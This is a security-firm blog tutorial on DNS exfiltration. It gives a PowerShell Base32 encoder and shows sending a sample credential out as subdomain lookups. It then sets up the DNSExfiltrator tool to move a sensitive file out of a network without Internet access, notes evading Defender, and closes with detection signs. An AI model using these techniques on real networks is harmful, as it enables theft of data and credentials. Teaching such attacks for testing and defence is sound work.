Data Theft Exploit: DNS Exfiltration Attack
| | | |

Data Theft Exploit Part 2: DNS Exfiltration Attack

ByJason Taylor

If you joined me last month for Data Theft Exploit Part 1: DNS Exfiltration Setup, you already have an environment setup for exfiltrating data from a secured network using DNS exfiltration. In this final part in this two-part series, we’ll walk through both manual and tool assisted DNS exfiltration attacks.

Manual DNS Exfiltration

We can quickly and easily exfiltrate small amounts of data by performing a DNS lookup on a subdomain of the data we want to exfiltrate. For example, if we wanted to exfiltrate the contact info of a fictional employee Alice Smith, 404-555-7834, we could perform a DNS lookup for alicesmith-4045557834.<domain>.

Perform a DNS lookup to exfiltrate a small amount of data

On our server we can then monitor the query.log, and we can see our data coming through as the DNS query.

Query.log shows the data coming through to our server

DNS domains are restricted in what characters are valid, which means some information may not be transferable via this method on their own. You also have to keep track of domain length restrictions as well.

You can get around these restrictions by encoding your data in Base32 and splitting it up into chunks. DNS does not preserve case, which means Base64 or similar encoding is not possible. Base32 is not case sensitive and doesn’t use special characters that may be invalid in DNS queries.

Let’s try to exfiltrate the following credential via Base32 encoding it: 

administrator:my@dmin^pa%w0rd!

Currently, PowerShell doesn’t have a built in Base32 encoder, but it is easy enough to create your own function.

function ConvertTo-Base32 {
    param(
        [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
        [string]$InputString
    )
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($InputString)
    $alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
    $binaryString = -join ($bytes | ForEach-Object { 
        [Convert]::ToString($_, 2).PadLeft(8, '0') 
    })
    $chunks = [regex]::Matches($binaryString, '.{1,5}') | ForEach-Object {
        $_.Value.PadRight(5, '0').Substring(0,5)
    }
    $base32 = -join ($chunks | ForEach-Object { 
        $alphabet[[Convert]::ToInt32($_, 2)] 
    })
    return $base32
}

Here we create our function, encode our data, and exfiltrate it.

Creating the function to exfiltrate the data

On the server side we can see the query in our query.log and can easily Base32 decode it to get our original credentials back.

Receiving the query in query.log on our server

Tooling Assisted DNS Exfiltration

While transferring simple strings via raw DNS queries is quick and easy, transferring a file or other large dataset would require parsing and chunking the data into smaller sizes that fit within a DNS query. You then need to reconstruct the exfiltrated file on the other end. For this purpose we can turn to existing tools that specialize in DNS data exfiltration.

DNSExfiltrator on Server

For the following we will need to stop the BIND server on our Kali server so that the DNSExfiltrator script can take over for DNS queries. Run systemctl stop named to stop the service.

Stopping the BIND server on our Kali server

Next, we will download the DNSExfiltrator project from GitHub. We will use rkbennett’s fork of the original project as it is updated for Python3 support. 

git clone https://github.com/rkbennett/DNSExfiltrator
Downloading the DNSExfiltrator project from GitHub

We need to install the required Python dependencies using PIP. Best practice is to first create a virtual environment to run this script from. You may need to install python3-venv with apt install python3-venv if it’s not already available.

Install the required Python dependencies using PIP

Change into the DNSExfiltrator directory to create and activate a new Python virtual environment.

cd DNSExfiltrator
python3 -m venv .venv
source .venv/bin/activate
Creating and activating the new Python virtual environment

Install the requirements:

 pip install -r requirements.txt
Install the requirements

Finally, we can start the DNSExfiltrator server:

python3 [dnsexfiltrator.py](<http://dnsexfiltrator.py>) -d <domain> -p <password>
Starting the DNSExfiltrator server

The service is now listening to DNS requests and looking for files to be reconstructed.

DNSExfiltrator Client

On our client system, where the data we want to exfiltrate is, we will need to download the same DNSExfiltrator files. In this case we are on a Windows system and will specifically require the Invoke-DNSExfil.ps1 file. Download the file or repository as needed. 

In the following example we bypassed client-side protections from Defender to allow the download of the script. In the real world an attacker (or authorized security consultant) would obfuscate or recreate the script in a way that is not detected by client-side antivirus.

Bypassing Defender for this example

We will need to dot source the Invoke-DNSExfil.ps1 script to make the functions available to our terminal:

. .\Invoke-DNSExfil.ps1
Dot source the Invoke-DNSExfil.ps1 script

For this demonstration we have a sensitive file that we need to exfiltrate, but we aren’t allowed any Internet access. While we can’t access the Internet, we can query domain names.

A sensitive file we want to exfiltrate

Using DNSExfiltrator we can quickly and easily send this file out over DNS.

Use DNSExfiltrator to quickly and easily send the file to our server

On the server we can see that the file was received successfully.

The file successfully received on our server

Finally, we can unzip and read the contents of our sensitive file.

Unzip and read the file

Detecting DNS Exfiltration Attempts

Protecting your network from DNS exfiltration can be a difficult task. The simple task of looking up a domain name is a frequent and common activity on networks. The actual exfiltration doesn’t originate from a workstation or compromised server, instead the DNS server of the environment unknowingly exfiltrates the data by the act of querying the Internet for the IP address of a particular domain name via forward lookup.

Protecting against DNS exfiltration involves a combination of network logging, analysis, and advanced security tools. Some techniques for detecting DNS exfiltration are:

  • Unusual DNS query volume or spikes in DNS requests to the same domain or IP address
  • Excessively long subdomains or domain names that are not human readable
  • Newly registered or newly accessed domains for your environment
  • High entropy domains or subdomains, indicating hex encoded payloads
  • Behavioral analysis and trends that show domain query traffic outside of typical working hours

Most of the above techniques require a comprehensive SIEM and associated analysis tools and security add-ons to detect and alert on unusual DNS traffic that may indicate DNS exfiltration is taking place.

Conclusion

Thanks for taking the time to follow along. If you’re interested in more data exfiltration tutorials, check out Nathan Anderson’s recent blog on Croc for secure data exfiltration. If you’re interested to find out if your organization is at risk, Raxis internal network and cloud penetration testing is ready to test your systems.

Jason has a passion for asking “what-if” questions and for trying to "break" software and test how it responds to unintended uses. Jason has a background in System Administration and Security Engineering in the financial sector. He holds both defensive and offensive certifications including OSCP, PNPT, GCIH, CASP+, and is Splunk Certified. When he’s not spending his time taking new training courses, he loves spending time with his wife and kids and occasionally working on an IoT project to automate some aspect of their greenhouse or chicken coop.

Similar Posts